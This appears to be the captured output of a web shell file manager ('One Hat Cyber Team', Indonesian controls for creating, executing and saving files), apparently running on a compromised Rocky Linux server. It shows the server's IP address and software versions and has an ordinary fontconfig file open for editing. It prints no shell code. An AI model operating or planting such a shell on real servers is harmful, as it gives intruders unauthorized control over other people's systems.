One Hat Cyber Team
Your IP :
172.69.58.131
Server IP :
188.114.96.7
Server :
Linux advantage-project 5.14.0-503.26.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 19 16:28:19 UTC 2025 x86_64
Server Software :
Apache/2.4.62 (Rocky Linux) OpenSSL/3.2.2
PHP Version :
8.3.17
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
etc
/
fonts
/
conf.d
/
Edit File:
25-no-bitmap-fedora.conf
<?xml version="1.0"?> <!DOCTYPE fontconfig SYSTEM "fonts.dtd"> <fontconfig> <match target="font"> <test name="family" compare="eq"> <string>Kochi Mincho</string> </test> <edit name="embeddedbitmap" mode="assign"> <bool>false</bool> </edit> </match> <match target="font"> <test name="family" compare="eq"> <string>Kochi Gothic</string> </test> <edit name="embeddedbitmap" mode="assign"> <bool>false</bool> </edit> </match> <match target="font"> <test name="family" compare="eq"> <string>Sazanami Mincho</string> </test> <edit name="embeddedbitmap" mode="assign"> <bool>false</bool> </edit> </match> <match target="font"> <test name="family" compare="eq"> <string>Sazanami Gothic</string> </test> <edit name="embeddedbitmap" mode="assign"> <bool>false</bool> </edit> </match> <match target="font"> <test name="family" compare="eq"> <string>AR PL ShanHeiSun Uni</string> </test> <edit name="embeddedbitmap" mode="assign"> <bool>true</bool> </edit> </match> </fontconfig>
Simpan